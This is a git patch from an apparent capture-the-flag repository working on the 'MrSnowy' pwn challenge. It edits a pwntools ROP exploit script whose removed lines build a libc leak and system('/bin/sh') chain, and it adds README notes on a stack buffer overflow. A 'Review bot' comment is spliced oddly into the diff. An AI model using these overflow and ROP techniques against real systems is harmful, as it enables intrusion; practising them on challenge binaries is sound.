From 3365ce2c4ecc22e5de4af812e39e76a8d6ef7114 Mon Sep 17 00:00:00 2001
From: aaron
Date: Wed, 8 Dec 2021 01:13:35 +0100
Subject: [PATCH] add exploit script
---
 pwn/mrsnowy/.gdb_history | 3 +
 pwn/mrsnowy/kabuttmache.py | 25 +-------
 pwn/mrsnowy/mr_snowy | Bin 13496 -> 13496 bytes
 pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile | 0
 pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile.lock | 0
 pwn/mrsnowy/mrsnowy.bak/README.md | 63 +++++++++++++++++++++
 pwn/mrsnowy/{ => mrsnowy.bak}/core | Bin
 pwn/mrsnowy/mrsnowy.bak/mr_snowy | Bin 0 -> 13496 bytes
 pwn/mrsnowy/{ => mrsnowy.bak}/pwn.py | 0
 pwn/mrsnowy/{ => mrsnowy.bak}/target | 0
 10 files changed, 67 insertions(+), 24 deletions(-)
 create mode 100644 pwn/mrsnowy/.gdb_history
 rename pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile (100%)
 rename pwn/mrsnowy/{ => mrsnowy.bak}/Pipfile.lock (100%)
 create mode 100644 pwn/mrsnowy/mrsnowy.bak/README.md
 rename pwn/mrsnowy/{ => mrsnowy.bak}/core (100%)
 create mode 100755 pwn/mrsnowy/mrsnowy.bak/mr_snowy
 rename pwn/mrsnowy/{ => mrsnowy.bak}/pwn.py (100%)
 rename pwn/mrsnowy/{ => mrsnowy.bak}/target (100%)
diff --git a/pwn/mrsnowy/.gdb_history b/pwn/mrsnowy/.gdb_history
new file mode 100644
index 0000000..fd4eab9
--- /dev/null
+++ b/pwn/mrsnowy/.gdb_history
@@ -0,0 +1,3 @@
+stack
+r
+quit
diff --git a/pwn/mrsnowy/kabuttmache.py b/pwn/mrsnowy/kabuttmache.py
index 72ef5fa..c54bbcc 100755
--- a/pwn/mrsnowy/kabuttmache.py
+++ b/pwn/mrsnowy/kabuttmache.py
@@ -17,7 +17,7 @@ def do_read():
 rop = ROP(elf)
 rop.call(elf.symbols['puts'], [elf.got['puts']])
-rop.call(elf.symbols['investigate'])
+rop.call(elf.symbols['deactivate_camera'])
 # assemble payload
 payload = [
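Review bot: The `rop.call(elf.symbols['puts'], [elf.got['puts']])` call on the context line directly above the changed line becomes dead weight with this commit: the second hunk of this file deletes the `u64(p.recvuntil(...))` consumer, so the chain still emits the leak but nothing in the script reads it and the raw bytes simply land in the `p.interactive()` session. Either drop that line or keep it with a comment stating the intent, e.g. `# puts leak no longer parsed; left in for manual inspection only`. The commit message does not say why the return target moved from `investigate` to `deactivate_camera`, so a one-line comment above the new call explaining the reason would help the next reader. The `rop`/`payload` assembly is top-level script code whose surrounding statements start and end outside this hunk.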
@@ -32,28 +32,5 @@ do_read()
 # send payload
 p.sendline(b''.join(payload))
-puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
-log.info(f'puts found at {hex(puts)}')
-# Note:
-# libc database search for puts address: 0x6d31333b315b1b20
-# -> libc6_2.19-18+deb8u10_i386
-# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
-
-libc = ELF("libc6_2.19-18+deb8u10_i386.so")
-libc.address = puts - libc.symbols["puts"]
-log.info(f'libc base address determined {hex(libc.address)}')
-
-rop = ROP(libc)
-rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
-rop.call('exit')
-
-# assemble payload
-payload = [
- b'\xAA'*offset,
- rop.chain()
-]
-
-p.sendline(b''.join(payload))
 p.interactive()
diff --git a/pwn/mrsnowy/mr_snowy b/pwn/mrsnowy/mr_snowy
index e57bee2e9a31cece0b18a634f93fbda65183adff..c5f91ca75693d84c948ea5efa1e1347940bae15b 100755
GIT binary patch
delta 18
Xcmdmyxg&FfyC~}f5ZLS^nj;SYP<02x

delta 18
acmdmyxg&FfyC~}moxlJ8Z}t(*kp}=-YzYDY

diff --git a/pwn/mrsnowy/Pipfile b/pwn/mrsnowy/mrsnowy.bak/Pipfile
similarity index 100%
rename from pwn/mrsnowy/Pipfile
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile
diff --git a/pwn/mrsnowy/Pipfile.lock b/pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
similarity index 100%
rename from pwn/mrsnowy/Pipfile.lock
rename to pwn/mrsnowy/mrsnowy.bak/Pipfile.lock
diff --git a/pwn/mrsnowy/mrsnowy.bak/README.md b/pwn/mrsnowy/mrsnowy.bak/README.md
new file mode 100644
index 0000000..ae9c3d2
--- /dev/null
+++ b/pwn/mrsnowy/mrsnowy.bak/README.md
@@ -0,0 +1,63 @@
+# MrSnowy
+
+There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
+But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
+Something must be wrong with him.
+
+## Flag
+
+Not pwned
+
+## Progress so far
+
+![vulnerable function](images/investigate.png)
+
+- The `read()` reads 0x108 bytes of input from stdin
+ - The buffer is uninitialized
+ - The functioncall sits at `*investigate+67`
+- The Stackframe of the function only has a size of 0x40 bytes
+- `checksec --file=mrsnowy` reports NX being enabled
+ - So no shellcode will be placable unless there is executable space
+ - This hints to ROP Chaining
+
+
+![dissasembly of investigate function](images/investigate_disass.png)
+
+- The binary should be patched to get rid of the timetaking animation
+ - Just `nop` the banner() function call using radare2
+- Overwriting the returnpointer of `investigate()` using pwntools:
+
+```python
+context(arch='x86_64', os='linux')
+context.terminal = ['/usr/bin/alacritty', '-e']
+e = ELF("mr_snowy")
+p = process(e.path)
+
+# read banner and stuff until input is requested
+def do_read():
+ while True:
+ ll = p.read()
+ print(ll)
+ if b'>' in ll:
+ break
+
+# if not patched wait for the animation and send 1
+do_read()
+p.sendline('1')
+do_read()
+
+# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
+p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
+
+# start the python debugger to get a coredump which is loadable by gdb
+ipdb.set_trace()
+```
+
+- Trying to find ROP Gadgets using pwntools
+
+```python
+e = ELF("mr_snowy")
+rop = ROP(elf)
+rop.rbx
+rop.gadgets
+```
diff --git a/pwn/mrsnowy/core b/pwn/mrsnowy/mrsnowy.bak/core
similarity index 100%
rename from pwn/mrsnowy/core
rename to pwn/mrsnowy/mrsnowy.bak/core
diff --git a/pwn/mrsnowy/mrsnowy.bak/mr_snowy b/pwn/mrsnowy/mrsnowy.bak/mr_snowy new file mode 100755 index 0000000000000000000000000000000000000000..e57bee2e9a31cece0b18a634f93fbda65183adff GIT binary patch literal 13496 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 literal 0 HcmV?d00001 diff --git a/pwn/mrsnowy/pwn.py b/pwn/mrsnowy/mrsnowy.bak/pwn.py similarity index 100% rename from pwn/mrsnowy/pwn.py rename to pwn/mrsnowy/mrsnowy.bak/pwn.py diff --git a/pwn/mrsnowy/target b/pwn/mrsnowy/mrsnowy.bak/target similarity index 100% rename from pwn/mrsnowy/target rename to pwn/mrsnowy/mrsnowy.bak/target